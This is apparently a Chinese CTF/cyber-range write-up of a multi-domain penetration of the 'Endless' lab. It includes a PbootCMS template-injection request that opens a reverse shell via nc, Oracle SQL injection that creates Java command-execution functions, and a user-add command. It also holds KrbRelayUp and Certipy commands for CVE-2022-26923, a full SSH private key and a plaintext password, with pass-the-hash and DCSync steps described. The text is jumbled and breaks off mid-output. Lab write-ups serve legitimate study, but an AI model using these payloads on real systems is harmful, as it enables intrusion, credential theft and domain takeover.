flag1<\/h2>\n\n\n\n
\u5f00\u4e86\u4e4b\u540e\u76f4\u63a5\u7ed9\u4e86\u4e24\u4e2aip\uff0c39.99.253.243\u548c39.99.249.22\uff0c39.99.253.243\u662f\u7ad9\u5e93\u5206\u79bb\u7684\u7ad9\uff0c39.99.249.22\u662fPbootCMS<\/p>\n\n\n\n
172.23.4.32(\u5916\u7f51pbootcms\u5165\u53e3\u70b9)<\/h3>\n\n\n\n
https:\/\/guokeya.github.io\/post\/WscncUrcS\/<\/a>\u5f00\u6284<\/p>\n\n\n\n \u5199\u6587\u4ef6\u5199\u4e0d\u4e86\uff0c\u9009\u62e9\u5f39shell\uff0c\u4f46\u8fd9\u4e2a\u903c\u73af\u5883\u7684nc\u4e0d\u652f\u6301-e\uff0c\u6362\u4e86\u4e2a\u62bd\u8c61\u5f39\u6cd5<\/p>\n\n\n\n \u7136\u540e\u7528CVE-2022-2588<\/a>\u63d0\u6743<\/p>\n\n\n\n \u8fd0\u884c\u5b8c\u4e4b\u540e\u4f1a\u591a\u4e00\u4e2a\u8d26\u6237\uff0c\u8fd9\u4e2a\u8d26\u6237\u662froot\u6743\u9650\u7684\uff0c\u8d26\u53f7\u548c\u5bc6\u7801\u90fd\u662fuser<\/p>\n\n\n\n \u626b\u4e00\u626b\u5185\u7f51<\/p>\n\n\n\n \u8fd9\u4e2a\u7ad9\u662f\u5c5e\u5b9e\u62bd\u8c61\uff0c\u4e0d\u77e5\u9053\u73af\u5883\u6709\u4ec0\u4e48\u95ee\u9898\uff0c\u5341\u6b21\u91cc\u516b\u6b21\u73af\u5883\u5d29\u6e83\uff0c\u65e0\u8bba\u8f93\u5165\u5565\u67e5\u8be2\u8fd4\u56de\u7684\u90fd\u662fnull\uff0c\u4f30\u8ba1\u662foracle\u6570\u636e\u5e93\u6ca1\u521d\u59cb\u5316\u597d\uff1f\u53cd\u6b63\u6253\u7684\u6211\u5fc3\u6001\u6709\u70b9\u7ef7\uff0c\u53ea\u80fd\u4e00\u904d\u904d\u7684\u91cd\u5f00\u7948\u7977\u73af\u5883\u6b63\u5e38\uff0c\u67d0\u4e00\u6b21\u8fd0\u6c14\u597d\u7ec8\u4e8e\u542f\u52a8\u6210\u529f\u4e86\uff0c\u8d76\u7d27\u4e0a\u53bb\u67e5\u4e00\u4e0boracle\u7684\u7248\u672c\uff1a<\/p>\n\n\n\n \u8fd4\u56de<\/p>\n\n\n\n \u7136\u540e\u53bb\u672c\u5730\u642d\u4e86\u4e2a\u4e00\u6837\u7684\u73af\u5883\uff0c\u770b\u7684\u662f\u8fd9\u7bc7\u6587\u7ae0Windows10\u4e0b\u5b89\u88c5Oracle 11g<\/a>\uff0c\u535a\u4e3b\u7ed9\u7684\u5b89\u88c5\u7a0b\u5e8f\u80fd\u5728\u672c\u5730\u5b89\u88c5\u4e00\u4e2a\u4e00\u6837\u7248\u672c\u7684oracle\u6d4b\u8bd5payload\uff0c\u63d0\u6743\u770b\u7684Oracle\u547d\u4ee4\u6267\u884c\u5c0f\u7ed3<\/a>\uff0c\u4f7f\u7528sys.dbms_cdc_publish.create_change_set\u63d0\u6743\uff0c\u6700\u540epoc:<\/p>\n\n\n\n \u53cd\u6b63\u5c31\u7b97oracle\u521d\u59cb\u5316\u6210\u529f\u63d0\u6743\u5341\u6b21\u4e5f\u6709\u516b\u6b21\u4e0d\u6210\u529f\uff0c\u5f88\u96be\u7ef7\uff0c\u6253\u4e86\u5f88\u591a\u904d\u7ec8\u4e8e\u6709\u4e00\u6b21\u6210\u529f\u4e86\uff1a<\/p>\n\n\n\n \u4f46\u60f3\u6267\u884cdir\u76f4\u63a5\u62a5\u9519\uff0c\u60f3type\u76f4\u63a5\u8bfbflag\u4e5f\u662f\u76f4\u63a5\u62a5\u9519\uff0cnet user\u67e5\u7528\u6237\u76f4\u63a5\u8fd4\u56de\u7a7a\uff0c\u540e\u9762\u81ea\u5df1\u52a0\u4e86\u4e2a\u7528\u6237\uff0c\u7528\u4e0a\u9762\u90a3\u4e2a\u5165\u53e3\u70b9\u642d\u4e86\u4e2a\u4ee3\u7406\uff0c\u7136\u540eevil-winrm\u8fc7\u53bb\u4e5f\u662f\u76f4\u63a5\u62a5\u9519\uff0c\u4e5f\u4e0d\u77e5\u9053\u548b\u6253\u4e86\u3002<\/p>\n\n\n\n \u672c\u5730\u8bd5\u4e86\u4e00\u4e0b\u786e\u5b9e\u6ca1\u6cd5\u76f4\u63a5\u6267\u884c\u547d\u4ee4\uff0c\u6709\u5947\u602a\u62a5\u9519<\/p>\n\n\n\n \u7ecf\u8fc7\u7814\u7a76\u53ef\u4ee5\u4f7f\u7528cmd.exe \/c+\u547d\u4ee4\u8fd9\u79cd\u5f62\u5f0f\u6267\u884c<\/p>\n\n\n\n \u8bfb\u6587\u4ef6\u5565\u7684\u4e5f\u53ef\u4ee5\u6210\u529f<\/p>\n\n\n\n \u5982\u679c\u6210\u529f\u6267\u884c\u53ef\u4ee5\u6dfb\u52a0\u4e2a\u8d26\u6237RDP\u4e0a\u53bb<\/p>\n\n\n\n \u684c\u9762\u6709\u4e00\u4e2a\u8bb0\u4e8b\u672c\uff0c\u5e76\u4e14flag\u4e5f\u5728\u684c\u9762\uff1aflag{Do_you_kown_oracle_rce?}<\/p>\n\n\n\n \u5229\u7528172.23.4.51\u684c\u9762\u7684\u8bb0\u4e8b\u672c\u7684\u51ed\u636e<\/p>\n\n\n\n \u5f88\u660e\u663e\u8fd9\u4e2a\u53f7\u4e0e172.23.4.12\u6709\u5173\uff0c\u56e0\u4e3a\u5927\u4f19\u90fd\u662fpentest.me\u8fd9\u4e2a\u57df\u5185\u7684\uff0c\u5176\u4ed6\u626b\u51fa\u6765\u7684\u4e09\u53f0\u673a\u5668\u548c\u57df\u90fd\u6ca1\u5173\uff0c\u8bd5\u4e86\u4e00\u4e0b\u80fdRDP\uff0c\u8fd9\u91cc\u6709\u4e2a\u56f0\u6270\u6211\u5f88\u4e45\u7684\u50bb\u903c\u62a5\u9519\uff0c\u7528rdesktop\u6216\u8005windows\u7684rdp\u90fdrdp\u4e0d\u4e0a\u53bb<\/p>\n\n\n\n \u540e\u9762\u6362\u4e86remmina\u5c31\u6210\u529f\u4e86\uff0c\u795e\u5947(sudo apt install remmina)<\/p>\n\n\n\n \u7f3a\u70b9\u662f\u8fd9\u4e2a\u5de5\u5177\u6ca1\u6cd5\u76f4\u63a5\u62d6\u6587\u4ef6\u8fdb\u53bb\uff0c\u5f97\u7528\u5171\u4eab\u6587\u4ef6\u5939\uff0c\u7528root\u6743\u9650\u542f\u52a8remmina<\/p>\n\n\n\n krbrelayup\u80fd\u63d0\u6743\u3002\u53d1\u73b0\u4e00\u4e2a\u795e\u4e2d\u795e\u9879\u76ee\uff0c\u628a\u5185\u7f51\u8981\u7528\u7684\u5de5\u5177\u6253\u5305\u597d\u4e86\uff1ahttps:\/\/github.com\/expl0itabl3\/Toolies<\/p>\n\n\n\n \u53ea\u4e0d\u8fc7\u4f3c\u4e4e\u4e0d\u9700\u8981\u63d0\u6743\uff0cflag\u5c31\u5728\u684c\u9762\u4e0a<\/p>\n\n\n\n C:\\users\\usera\\\u76ee\u5f55\u4e0b\u6709.ssh\u76ee\u5f55\uff0cknown_hosts\u770b\u5230\u6709\u4e2aIP 172.23.4.19\u4ee5\u53ca\u516c\u79c1\u94a5\uff0c\u80fd\u7528\u6765\u767b172.23.4.19<\/p>\n\n\n\n \u8fd9\u91cc\u6d89\u53ca\u5230\u4e00\u4e2a\u95ee\u9898\uff0c\u56e0\u4e3a\u8fd9\u4e2a\u73af\u5883\u662f\u4e2a\u57df\u6797\uff0c\u6d89\u53ca\u5230\u8de8\u57df\u64cd\u4f5c\uff0c\u5982\u4f55\u5b9e\u73b0\u8de8\u57df\u7684\u653b\u51fb\u5462\uff0c\u6211\u4eec\u7528ipconfig\u67e5\u8be2\u4f1a\u53d1\u73b0\u8fd9\u4e2a\u670d\u52a1\u5668\u5176\u5b9e\u662f\u53cc\u7f51\u5361\u7684\uff0cip 172.23.4.12\u662f\u4e00\u4e2a\u7f51\u6bb5\uff0cip 172.24.7.16\u53c8\u662f\u4e00\u4e2a\u7f51\u6bb5\uff0c\u5c31\u662f\u901a\u8fc7\u8fd9\u79cd\u65b9\u5f0f\u5b9e\u73b0\u4e86\u4e0d\u540c\u7f51\u6bb5\u7684\u76f8\u8fde\uff0c\u540e\u9762\u8de8\u57df\u4e5f\u662f\u8fd9\u4e2a\u539f\u7406\uff0c\u8fd9\u91cc\u5229\u7528\u8fd9\u53f0\u673a\u5668\u642d\u5efa\u524d\u5f80172.24.7.0\/24\u7f51\u6bb5\u7684\u4ee3\u7406<\/p>\n\n\n\n \u79c1\u94a5\u767b\u5f55\u8fdb\u5165172.23.4.19\uff0c\u83b7\u5f97\u4e86\u4e0a\u9762\u7ad9\u5e93\u5206\u79bb\u90a3\u4e2a\u5165\u53e3\u70b9\u7684web\u670d\u52a1\u5668\uff0c\u83b7\u53d6\u5230root\u6743\u9650\uff0c\u7136\u540e\u83b7\u5f97flag<\/p>\n\n\n\n \u91cd\u65b0\u626b\u4e00\u4e0b\u5185\u7f51\uff0c\u5728172.23.4.12\u626b\u4e00\u4e0b172.24.7.16\/24<\/p>\n\n\n\n \u57df\u63a7\u8fd9\u91cc\u80fd\u76f4\u63a5\u6253CVE-2022-26923<\/p>\n\n\n\n \u5148\u521b\u5efa\u673a\u5668\u8d26\u6237<\/p>\n\n\n\n \u7136\u540e\u4e3a\u57df\u7ba1\u751f\u6210\u8bc1\u4e66<\/p>\n\n\n\n \u8fd8\u539f\u54c8\u5e0c<\/p>\n\n\n\n \u8fd8\u539f\u54c8\u5e0c\u53d1\u73b0\u5931\u8d25\u4e86\uff0c\u9009\u62e9\u5229\u7528\u51ed\u636e\u914d\u7f6eRDCB\u6253<\/p>\n\n\n\n \u8fd9\u91cc\u76f4\u63a5\u56de\u8f66\u914d\u7a7a\u5bc6\u7801<\/p>\n\n\n\n whoami\uff0c\u8bc1\u660e\u6211\u4eec\u786e\u5b9e\u53ef\u4ee5\u7ee7\u7eed\u5f80\u4e0b\u6253\u4e86<\/p>\n\n\n\n \u4e0b\u4e00\u6b65\u5c06\u8bc1\u4e66\u914d\u7f6e\u5230\u57df\u63a7\u7684 RBCD(\u8fd9\u91cc\u9700\u8981\u628adc\u52a0\u5230hosts\u91cc)<\/p>\n\n\n\n \u7533\u8bf7ST<\/p>\n\n\n\n \u5bfc\u5165\u51ed\u636e<\/p>\n\n\n\n \u8fde\u4e0a\u53bb<\/p>\n\n\n\n \u62ffflag<\/p>\n\n\n\n dump\u54c8\u5e0c<\/p>\n\n\n\n 172.24.7.3\u5176\u5b9e\u4e5f\u662f\u53cc\u7f51\u5361\uff1a172.24.7.3-172.25.12.9<\/p>\n\n\n\n pth\u8fc7\u53bb<\/p>\n\n\n\n \u7528\u4e0a\u9762\u5728pentest.me\u91cc\u9762DCSync\u83b7\u53d6\u5230\u7684\u7ba1\u7406\u5458\u51ed\u636e\u76f4\u63a5\u6a2a\u5411\u8fc7\u53bb<\/p>\n\n\n\n \u8fd9\u91cc\u4e5f\u662f\u53cc\u7f51\u5361\uff0c172.24.7.43 – \u53cc\u7f51\u5361 – 172.26.8.12<\/p>\n\n\n\n \u8fd9\u91cc\u6d89\u53ca\u5230\u8de8\u57df\uff0c\u9700\u8981\u4ecepentest.me(172.24.7.XXX)\u8de8\u57df\u5230pen.me(172.25.12.XXX)\uff0c\u65b9\u6cd5\u8fd8\u662f\u53cc\u7f51\u5361\uff1a172.24.7.5->172.25.12.7<\/p>\n\n\n\n Administrator@pentest.me \u662f dcadmin.pen.me\u7684\u7ba1\u7406\u5458\uff0c\u800c\u4e14\u6709sid history\uff0c\u7406\u8bba\u4e0a\u80fddir \\\\dcadmin.pen.me\\C$\u76f4\u63a5\u6a2a\u5411\uff0c\u4e0d\u8fc7\u4e8b\u5b9e\u4e0a\u4e0d\u884c\uff0c\u7528\u7315\u7334\u6843\u5229\u7528\u4e00\u4e0b<\/p>\n\n\n\n \u7136\u540edynsc<\/p>\n\n\n\n pth\u4e0a\u53bb\u57df\u63a7<\/p>\n\n\n\n \u7528\u4e0a\u9762DCSync\u83b7\u53d6\u5230\u7684\u57df\u7ba1\u7406\u5458\u51ed\u636e\u76f4\u63a5\u6a2a\u5411\u5c31\u53ef\u4ee5\u83b7\u53d6\u5230 Flag 8 \u4e86<\/p>\n\n\n\n \u8fd8\u662f172.25.12.19\uff0c\u4f7f\u7528Exchange\u8fd9\u4e2a\u7528\u6237\u767b\u5f55\u8fdb\u5165OWA\uff0c\u6216\u8005\u76f4\u63a5\u5bfc\u51fa\u90ae\u4ef6\uff0c\u90ae\u4ef6\u91cc\u6709flag<\/p>\n\n\n\n \u76f4\u63a5\u6a2a\u5411<\/p>\n\n\n\n \u7528usera\u51ed\u636e\u767b\u5f55172.24.7.27:8090\u7684confluence\uff0c\u91cc\u9762\u6709\u4e00\u4e2a\u65e0\u95f4\u5b9e\u9a8c\u5ba4\u4eba\u5458\u540d\u5355.xlsx\uff0c\u5229\u7528ldap\u5224\u65ad\u6709\u6548\u51ed\u636e\u4f46\u90fd\u662f\u6709\u6548\u51ed\u636e\uff0c\u8fd9\u91cc\u6709\u70b9\u4e0d\u77e5\u9053\u600e\u4e48\u627e\u4e86\uff0c\u770b\u4e86\u4e0b\u522b\u4eba\u7684\u53d1\u73b0\u53ef\u4ee5\u7528gitlab\u7684api\u5224\u65ad\u6709\u6548\u7528\u6237\uff0c\u8def\u5f84\u662fhttps:\/\/ip:port\/api\/v4\/users<\/p>\n\n\n\n \u8fd4\u56de\u51ed\u8bc1<\/p>\n\n\n\n \u5229\u7528api<\/p>\n\n\n\n \u53ef\u4ee5\u77e5\u9053\u4e00\u5171\u53ea\u6709\u4e09\u4e2a\u6709\u6548\u7528\u6237\uff0cluzizhuo\u3001usera\u548croot\uff0c\u7528luzizhuo\u767b\u5f55\u8fdb\u5165gitlab\uff0c\u6709\u4e00\u4e2a\u79c1\u4eba\u9879\u76ee\u53eb Financial system-demo\uff0c\u627e\u5230commit\u8bb0\u5f55\u4fe1\u606f\uff1a<\/p>\n\n\n\n 172.24.7.43 \u8fd9\u53f0\u673a\u5668\u662f\u53cc\u7f51\u5361\uff0c\u901a\u5f80 172.26.8.0\/24\u7f51\u6bb5\uff0c\u7528\u4e4b\u524d\u57df\u63a7\u7684\u54c8\u5e0c\u76f4\u63a5pth\u8fc7\u53bb\uff0c\u7528smblient\u4f20\u6587\u4ef6<\/p>\n\n\n\n \u7136\u540e\u5728\u8fd9\u53f0\u673a\u5668\u4e0a\u505a\u901a\u5411172.26.8.0\/24\u7684\u4ee3\u7406\uff0c\u63a5\u7740\u7528PySQLTools\u4e00\u628a\u68ad\uff08\u8fd9\u91cc\u7528\u7684\u9879\u76ee\u662fhttps:\/\/github.com\/Ridter\/PySQLTools\uff09<\/p>\n\n\n\n CLR\u63d0\u6743<\/p>\n\n\n\n \u76f4\u63a5\u62ffflag<\/p>\n\n\n\n \u65e0\u95f4\u8ba1\u5212 Endless – \u6625\u79cb\u4e91\u5883<\/a><\/p>\n\n\n\nGET \/?a=}{pboot{user:password}:if((\"sys\\x74em\")(\"whoami\"));\/\/)}xxx{\/pboot{user:password}:if} HTTP\/1.1\nHost: 39.99.249.22\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/116.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: lg=cn; PbootSystem=7579ug8pfbc6tmtlmm0ft77sjd\nUpgrade-Insecure-Requests: 1<\/code><\/pre>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023%2F11%2F15-1.png\")
<\/div><\/figure>\n\n\n\nGET \/?a=}{pboot{user:password}:if((\"sys\\x74em\")(\"rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc xxx.xxx.xxx.xxx 9383 >\/tmp\/f\"));\/\/)}xxx{\/pboot{user:password}:if} HTTP\/1.1\nHost: 39.99.249.22\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/116.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: lg=cn; PbootSystem=7579ug8pfbc6tmtlmm0ft77sjd\nUpgrade-Insecure-Requests: 1<\/code><\/pre>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023%2F11%2F15-2.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023%2F11%2F15-3.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023%2F11%2F15-4.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023%2F11%2F15-5.png\")
<\/div><\/figure>\n\n\n\nstart infoscan\n(icmp) Target 172.23.4.32 is alive\n(icmp) Target 172.23.4.19 is alive\n(icmp) Target 172.23.4.12 is alive\n(icmp) Target 172.23.4.51 is alive\n[*] Icmp alive hosts len is: 4\n172.23.4.19:80 open\n172.23.4.32:80 open\n172.23.4.19:22 open\n172.23.4.32:22 open\n172.23.4.12:135 open\n172.23.4.51:135 open\n172.23.4.51:445 open\n172.23.4.12:445 open\n172.23.4.51:139 open\n172.23.4.12:139 open\n[*] alive ports len is: 10\nstart vulscan\n[*] NetInfo:\n[*]172.23.4.12\n [->]IZMN9U6ZO3VTRNZ\n [->]172.23.4.12\n [->]172.24.7.16\n[*] NetInfo:\n[*]172.23.4.51\n [->]iZfmb86anjmvj6Z\n [->]172.23.4.51\n[*] WebTitle: http:\/\/172.23.4.19 code:200 len:481 title:Search UserInfo\n[*] NetBios: 172.23.4.51 WORKGROUP\\IZFMB86ANJMVJ6Z \n[*] NetBios: 172.23.4.12 PENTEST\\IZMN9U6ZO3VTRNZ \n[*] WebTitle: http:\/\/172.23.4.32 code:200 len:19779 title:PbootCMS-\u6c38\u4e45\u5f00\u6e90\u514d\u8d39\u7684PHP\u4f01\u4e1a\u7f51\u7ad9\u5f00\u53d1\u5efa\u8bbe\u7ba1\u7406\u7cfb\u7edf\n[+] http:\/\/172.23.4.32\/www.zip poc-yaml-backup-file\n[+] http:\/\/172.23.4.32 poc-yaml-phpstudy-nginx-wrong-resolve php\n\u5df2\u5b8c\u6210 10\/10\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 13.505608744s<\/code><\/pre>\n\n\n\n172.23.4.32 pbootcms\n172.23.4.19 \u7ad9\u5e93\u5206\u79bb\u7684\u7ad9\n172.23.4.12 pentest.me\u57df\u5185\u673a\u5668\uff0cIZMN9U6ZO3VTRNZ.pentest.me\n172.23.4.51 \u5de5\u4f5c\u7ec4\u7684IZFMB86ANJMVJ6Z<\/code><\/pre>\n\n\n\nflag2<\/h2>\n\n\n\n
172.23.4.51(\u5916\u7f51\u7ad9\u5e93\u5206\u79bb\u5165\u53e3\u70b9)<\/h3>\n\n\n\n
admin' union SELECT null,(select banner FROM v$version WHERE banner LIKE 'Oracle%'),null from dual --<\/code><\/pre>\n\n\n\nOracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production<\/code><\/pre>\n\n\n\nadmin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named \"LinxUtil\" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str +=stemp+\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual)>1 --\n\nadmin' AND (SELECT dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate '' begin sys.dbms_cdc_publish.create_change_set('''' a'''',''''a'''',''''a''''''''||TEST.pwn()||''''''''a'''',''''Y'''',s ysdate,sysdate);end;''; commit; end;') from dual)>1--\n\nadmin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LINXRUNCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual)>1--\n\nadmin' union select null,(select object_name from all_objects where object_name ='LINXRUNCMD' and rownum=1),null from dual--\n\nadmin' union select null,(select LINXRUNCMD('whoami') from dual),null from dual--<\/code><\/pre>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023%2F11%2F23-1.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023%2F12%2F10-12.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023%2F12%2F10-13.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023%2F12%2F10-14.jpg\")
<\/div><\/figure>\n\n\n\nnet user fushuling qwer1234! \/add net \nlocalgroup administrators fushuling \/add<\/code><\/pre>\n\n\n\nflag3<\/h2>\n\n\n\n
172.23.4.12(IZMN9U6ZO3VTRNZ.pentest.me)(172.23.4.12->172.24.7.0\/24)<\/h3>\n\n\n\n
username: usera@pentest.me\npassword\uff1aAdmin3gv83<\/code><\/pre>\n\n\n\nCore(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.\nFailed to initialize NLA, do you have correct Kerberos TGT initialized ?\n\nFailed to connect, CredSSP required by server (check if server has disabled old TLS versions, if yes use -V option).\n<\/code><\/pre>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F02%2F06-1.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F02%2F06-2.jpg\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F02%2F06-3.jpg\")
<\/div><\/figure>\n\n\n\nKrbRelayUp.exe relay --domain xiaorang.lab --CreateNewComputerAccount --ComputerName fushuling$ --ComputerPassword pass@123\nKrbRelayUp.exe spawn -m rbcd -d xiaorang.lab -dc DC01.xiaorang.lab -cn fushuling$ -cp pass@123<\/code><\/pre>\n\n\n\n#id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAqlNiCeylxWOpMlzOkUhNNMq+G18pKwlgh3fp8ZTysnTrrHe78O2T\nsA8RnzbjhF5HErGbgo0fiM6bgoxEZlbE+cYl6tSuwKTTtH5h9ouc1AayplURFqwhq3ZJVB\nxDjGG07A3i7nHyVsG679UJM3IwQ\/xLQjhV3Me56Fe\/g2ZSHprVpjOn5i+uMGuTgNf7crRF\nzLsgZzyWm\/i\/mJ\/bGMdlpO72BDlREGYblJXKkk3kzg2X848+11L1VLuQFg\/RYS0I7gYgRZ\nS8teEdKBD3zPw6oVt7fxL6ko++wE7htH1nBwRage2z8cprr1mIoNpZenDPm8uxy9kkzb4Q\nGCYUjd8ntaSrs35JidpmiFzzesvJRp266oeloufURsbVJciS\/NqkwSEdv5ovvVAp+s01AP\nunez1fT3Mnszk6gv0bi9ntuCinwef6HBwvHzBR7WW14Jel0ubTyw37LV61xIOpQ+B+AtEK\nQaRNVQ\/6IVWs1aY5m4lrO3figw5377ePiW8dHzyJAAAFmMyGd6nMhnepAAAAB3NzaC1yc2\nEAAAGBAKpTYgnspcVjqTJczpFITTTKvhtfKSsJYId36fGU8rJ066x3u\/Dtk7APEZ8244Re\nRxKxm4KNH4jOm4KMRGZWxPnGJerUrsCk07R+YfaLnNQGsqZVERasIat2SVQcQ4xhtOwN4u\n5x8lbBuu\/VCTNyMEP8S0I4VdzHuehXv4NmUh6a1aYzp+YvrjBrk4DX+3K0Rcy7IGc8lpv4\nv5if2xjHZaTu9gQ5URBmG5SVypJN5M4Nl\/OPPtdS9VS7kBYP0WEtCO4GIEWUvLXhHSgQ98\nz8OqFbe38S+pKPvsBO4bR9ZwcEWoHts\/HKa69ZiKDaWXpwz5vLscvZJM2+EBgmFI3fJ7Wk\nq7N+SYnaZohc83rLyUaduuqHpaLn1EbG1SXIkvzapMEhHb+aL71QKfrNNQD7p3s9X09zJ7\nM5OoL9G4vZ7bgop8Hn+hwcLx8wUe1lteCXpdLm08sN+y1etcSDqUPgfgLRCkGkTVUP+iFV\nrNWmOZuJazt34oMOd++3j4lvHR88iQAAAAMBAAEAAAGAByJQ8+t2kgr3lkVu3YTyvuhTCC\nB3P\/c3lNT\/9n9vnuvoxyOIurGowvIOoeWRqASu42iPA+vXS0qkFta7MrIls\/SJuAlKfIUq\n3N+CSOpWGkdhijf77EAvdNgSgDRi2+lnw49dVvFs3hdlNhBtPztkLCTQHijv57xx2\/p46g\n8KF4ASvNBjEvAiUqLe3cGuJYLJfabE164g\/M1xcPoZGjOX3U2o\/kpMS+yK8TFI99HNaJgH\nKktwrWIrJm5ovZPSCEjzik1\/XNa8zZW2kGt\/nMHjLyFQv6U20YjFQ1AwAPO+5n4Drrn4Y3\n+9Uczrix9y1jGKYyZ7ZElibW3TQPjs1cMZLIwCEM9Qm0EhA3SfuUwP2cAVopWtXtEpw7iL\n8NAfdKVf2OEzZTEJgF4hrVCLDbZqoKFlre1sPCj5mnTCQHk96rr3FtGMLlIQTK0gy4d\/ib\nDTP+V4xCJIGtdr\/J+aRAyGi2M19NzS1u2XLLlmE1sbGPnXDiPbwbHCaAqO5a91YlLlAAAA\nwQCD4naC0k9YVdlSrFWcUMx54e65wRtyOgT3rqbU9kgZ5SWIRrddnMhqR3J58MC63f\/en5\nfu\/t0Otgayg9sThHeJLjhffv\/BQ0rDSYl9iqQM9MZXiKwG1tSE8n29VHak1xeVTE\/QSM9e\nW2Wp1yyacZOfd3zek57LbEuG9c\/ckOlKIl4T1qZR7\/zShqY+6\/PxgHUBEvdtPLUTpH5LUA\naoAnux2uGiycqQh725vgy\/Bxzm0tBvbtG8rmDE8GlDH3dXdI4AAADBANWL+AsQImzP7hDN\naTVr54hv6puwZdp08Mw6AfDu7ixQM6TX0\/vJ+HIVzDw1qGbTUTnQA5GdXc+Q1pgaTclHyI\nccN6BLmURGlWOnZIVTrncdYlW8FoSs6OgG+J6Aqrwc5Euvz3eKxcUf5l5Hx11HnOTKlzgq\nVfWDL8eiTJXBggLpo\/Jy3qiZK\/uLkstVWAFIumdMi3EWKSVBjUsc4kf9SspFUjH6BnnP90\naGv6Hyv+7Z2J8XiLNxzADAzhFDjfJZswAAAMEAzC\/EONR3j\/19+hFJXnEWefUu4Af7VELV\nCI6Mp+Gsl3iKxQ5\/HOEhreahQBYBx8Je47h7g+4eNXTg1A6Xm3g6kEDFseRPmdD4ib5+pU\nj+kfSbG1dEdq9BFlmt9Tqjon55pn4+TB+TnoGVRBb5Of7N9si9JjJUEJmemk6GeetuycZC\naIgh5gNH5X3\/40W0lkBgZRm1OSLKjzL\/P7Ym+0EO236hZF282qZ+rN7kjTbWRkqpdiXK+k\nb0sfmPLebR4HrTAAAAHXBlbnRlc3RcdXNlcmFAaVptbjl1NnpvM3Z0cm5aAQIDBAU=\n-----END OPENSSH PRIVATE KEY-----\n\n<\/code><\/pre>\n\n\n\nflag4<\/h2>\n\n\n\n
172.23.4.19<\/h3>\n\n\n\n
ssh -i id_rsa root@172.23.4.19<\/code><\/pre>\n\n\n\nflag5<\/h2>\n\n\n\n
172.24.7.3(DC.pentest.me)<\/h3>\n\n\n\n
proxychains4 -q certipy-ad account create -u usera@pentest.me -p Admin3gv83 -dc-ip 172.24.7.3 -user 'EVILCOMPUTER1$' -pass '123@#ABC' -dns 'DC.pentest.me'\nCertipy v4.7.0 - by Oliver Lyak (ly4k)\n\n[*] Creating new account:\n sAMAccountName : EVILCOMPUTER1$\n unicodePwd : 123@#ABC\n userAccountControl : 4096\n servicePrincipalName : HOST\/EVILCOMPUTER1\n RestrictedKrbHost\/EVILCOMPUTER1\n dnsHostName : DC.pentest.me\n[*] Successfully created account 'EVILCOMPUTER1$' with password '123@#ABC'<\/code><\/pre>\n\n\n\nproxychains certipy-ad req -u EVILCOMPUTER1\\$@pentest.me -p '123@#ABC' -ca pentest-DC-CA -dc-ip 172.24.7.3 -template machine\n[proxychains] config file found: \/etc\/proxychains4.conf\n[proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n[proxychains] DLL init: proxychains-ng 4.14\nCertipy v4.7.0 - by Oliver Lyak (ly4k)\n\n[*] Requesting certificate via 